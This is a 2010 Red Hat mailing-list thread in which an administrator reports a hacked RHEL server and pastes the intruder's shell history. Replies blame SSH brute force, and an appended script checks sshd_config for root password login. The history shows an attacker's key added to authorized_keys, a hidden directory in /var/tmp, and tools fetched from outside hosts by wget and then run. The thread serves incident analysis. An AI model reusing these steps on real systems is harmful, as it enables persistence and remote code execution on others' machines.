help

Marti, Robert RJM002 at shsu.edu
Thu Jan 28 12:11:44 UTC 2010


Brute force attacks. Leaving root ssh open to the world is begging to
be owned like this. Always turn that off or use key only auth for root
on Internet facing boxes.

Sent from my iPhone

On Jan 28, 2010, at 0:33, "Joy Methew" <ml4joy at gmail.com> wrote:

> Still, I'm thinking: how did he/she get my password??
>
>
> On Thu, Jan 28, 2010 at 11:58 AM, Joy Methew <ml4joy at gmail.com> wrote:
>
>> I have changed my root password.
>>
>>
>> On Thu, Jan 28, 2010 at 11:44 AM, Wahyu Darmawan <Wahyu.Darmawan at ag-it.com> wrote:
>>
>>> You may change your root password first, and then you can continue to
>>> analyze your system.
>>>
>>> ________________________________________
>>> From: redhat-list-bounces at redhat.com [redhat-list-bounces at redhat.com] On
>>> Behalf Of Joy Methew [ml4joy at gmail.com]
>>> Sent: Thursday, January 28, 2010 12:59 PM
>>> To: General Red Hat Linux discussion list
>>> Subject: help
>>>
>>> Hello all,
>>>
>>> I'm using RHEL5.3 as my mail server with a real IP. I configure my
>>> system mostly remotely. The last login time of my system was 27 Jan
>>> from this IP: 118.129.153.43.
>>> Then I tried to log in on 28 Jan in the morning, and I couldn't
>>> authenticate as root with my last password.
>>> Then I rebooted the system and reset my password.
>>> I logged in as root, then ran the "last" command. I'm sending the first
>>> 10 lines of the last command... I think someone hacked my system. I am
>>> sending the history command output.
>>> Now I have removed the .ssh directory and /var/tmp/*
>>>
>>> Please suggest what this is??
>>>
>>> Thanks
>>>
>>> last command output:
>>> root     pts/1        117.199.118.234  Thu Jan 28 10:58   still logged in
>>> root     pts/0        117.199.118.234  Thu Jan 28 10:49   still logged in
>>> root     tty1                          Thu Jan 28 10:48 - 10:52  (00:04)
>>> reboot   system boot  2.6.18-128.el5PA Thu Jan 28 10:45          (00:25)
>>> root     pts/2        165.red-79-153-1 Thu Jan 28 01:42 - 01:52  (00:09)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 23:02 - 01:27  (02:25)
>>> root     pts/2        165.red-79-153-1 Wed Jan 27 22:33 - 22:34  (00:00)
>>> root     pts/3        165.red-79-153-1 Wed Jan 27 22:32 - 22:33  (00:00)
>>> root     pts/2        118.129.153.43   Wed Jan 27 22:31 - 22:32  (00:01)
>>> root     pts/2        117.199.114.189  Wed Jan 27 15:47 - 15:51  (00:03)
>>>
>>> What is 165.red-79........? This is not my IP.
>>>
>>>
>>> History Output
>>>
>>> 115  cat /proc/cpuinfo
>>> 116  mkdir .ssh
>>> 117  cd .ssh
>>> 118  echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH 
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ 
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf 
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;  
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 119  cd /var/tmp
>>> 120  mkdir " "
>>> 121  cd " "
>>> 122  passwd
>>> 123  echo ssh-rsa
>>>
>>> AAAAB3NzaC1yc2EAAAABJQAAAIBSUxeR1W95aH 
>>> +iJwXRJaswx6YwqqZPk2BBLaGoJR5vnLARZbpMZzxfjo9wwed/FONEcnZFVo0eTkaZ 
>>> +xDaC8eDvT0A4gRC2ahK7sCM17nbRvwGdXPIKismvz6Xqp7mLRf 
>>> +I2jI6xKq8lba96U6uUHtbiaRi814IyJ3Q0It54KBwQ==
>>> rsa-key-20080201 >> ~/.ssh/authorized_keys; chmod 700 ~/.ssh;  
>>> chmod 600
>>> ~/.ssh/authorized_keys
>>> 124  ps -x
>>> 125  cd /var/tmp
>>> 126  w
>>> 127  wget http://kok.ucoz.de/gosh.tgz
>>> 128  tar xvf gosh.tgz
>>> 129  cd gosh
>>> 130  chmod +x *
>>> 131  ./go.sh 121
>>> 132  w
>>> 133  ps -x
>>> 134  ps -aux
>>> 135  cd /var/tmp
>>> 136  cd " "
>>> 137  ls -a
>>> 138  wget http://helpbnc.myftp.org/danger/fld.tgz
>>> 139  tar xzvf fld.tgz
>>> 140  cd fld
>>> 141  chmod +x *
>>> 142  nano cyc.acc
>>> 143  nano cyc.acc.1
>>> 144  nano cyc.set
>>> 145  ./httpd
>>> 146  w
>>> --
>>> redhat-list mailing list
>>> unsubscribe mailto:redhat-list-request at redhat.com? 
>>> subject=unsubscribe
>>> https://www.redhat.com/mailman/listinfo/redhat-list
>>>
>>
>>
> -- 
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request at redhat.com?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list
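
The advice at the top of this thread (turn root SSH login off, or make it key-only), as an added example that is not part of the original messages: a shell function that reads an sshd_config file and reports whether root can still log in with a password. The function names and the sample file are constructed, and absent keywords are assumed to take the pre-7.0 OpenSSH defaults.

```shell
#!/bin/sh
# Added example (not from the thread): classify how root may log in over SSH
# from an sshd_config file. Prints: disabled | key-only | password

# first_value FILE KEYS: first global value of any keyword in KEYS ("a|b",
# lower-case). sshd keeps the first value it reads; keywords are case-insensitive.
first_value() {
    awk -v keys="$2" '
        /^[ \t]*#/ { next }                    # comment line
        { sub(/=/, " ") }                      # "Keyword=value" form
        tolower($1) == "match" { exit }        # conditional blocks: out of scope
        tolower($1) ~ ("^(" keys ")$") { print tolower($2); exit }
    ' "$1"
}

root_login_mode() {
    root=$(first_value "$1" "permitrootlogin")
    pw=$(first_value "$1" "passwordauthentication")
    kbd=$(first_value "$1" "kbdinteractiveauthentication|challengeresponseauthentication")
    # Assumption: absent keywords take the pre-7.0 OpenSSH defaults (all "yes").
    : "${root:=yes}" "${pw:=yes}" "${kbd:=yes}"
    case $root in
        no) echo disabled ;;
        forced-commands-only) echo key-only ;;
        without-password|prohibit-password)
            # Before OpenSSH 7.0 this value still let root use
            # keyboard-interactive, so treat that path as a password login.
            if [ "$kbd" = no ]; then echo key-only; else echo password; fi ;;
        *)
            if [ "$pw" = no ] && [ "$kbd" = no ]; then echo key-only
            else echo password; fi ;;
    esac
}

# Constructed sample: a config that leaves root password login open,
# then one that turns root login off.
tmp=$(mktemp)
printf 'PermitRootLogin yes\nPasswordAuthentication yes\n' > "$tmp"
root_login_mode "$tmp"
printf 'PermitRootLogin no\n' > "$tmp"
root_login_mode "$tmp"
rm -f "$tmp"
```

Settings inside `Match` blocks are not evaluated, so a result of `key-only` or `disabled` describes the global section of the file only.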
